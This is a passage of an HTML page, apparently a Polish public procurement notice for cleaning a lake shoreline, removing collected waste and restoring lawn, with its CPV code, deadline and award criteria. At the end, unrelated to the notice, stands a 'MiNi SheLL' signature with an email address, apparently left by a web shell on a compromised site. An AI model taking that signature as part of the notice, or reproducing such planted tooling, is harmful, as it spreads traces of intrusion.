5.	Oczyszczanie lustra wody przybrzeżnej jeziora na powierzchni 5 mb od brzegu i długości 3500 mb/rok z zanieczyszczeń, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za 100 mb wód przybrzeżnych/;
6.	Wywóz zgromadzonych zanieczyszczeń luzem (do 20 kursów samochodu o ładowności min. 3,5 t /rok) załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za jeden kurs samochodu o ładowności min. 3,5 t na terenie miasta na samochód, wywóz na wysypisko i utylizacja /cena ustalona za jeden kurs/;
7.	Wywóz zgromadzonych zanieczyszczeń spakowanych w worki foliowe o pojemności 120 l (do 2000 worków), załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za jeden worek/. 
8.	Odtworzenie do 30 m2  zniszczonego trawnika - rekultywacja, uzupełnienie humusem, wsiew mieszanki traw i pielęgnacja do czasu ukorzenienia się roślin /cena za 1 m2/ .
Zlecenie robót odbywać się będzie w miarę potrzeb, poprzedzone ustaleniem ilości robót przy udziale upoważnionych przedstawicieli Zamawiającego i Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Kryterium społeczne - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com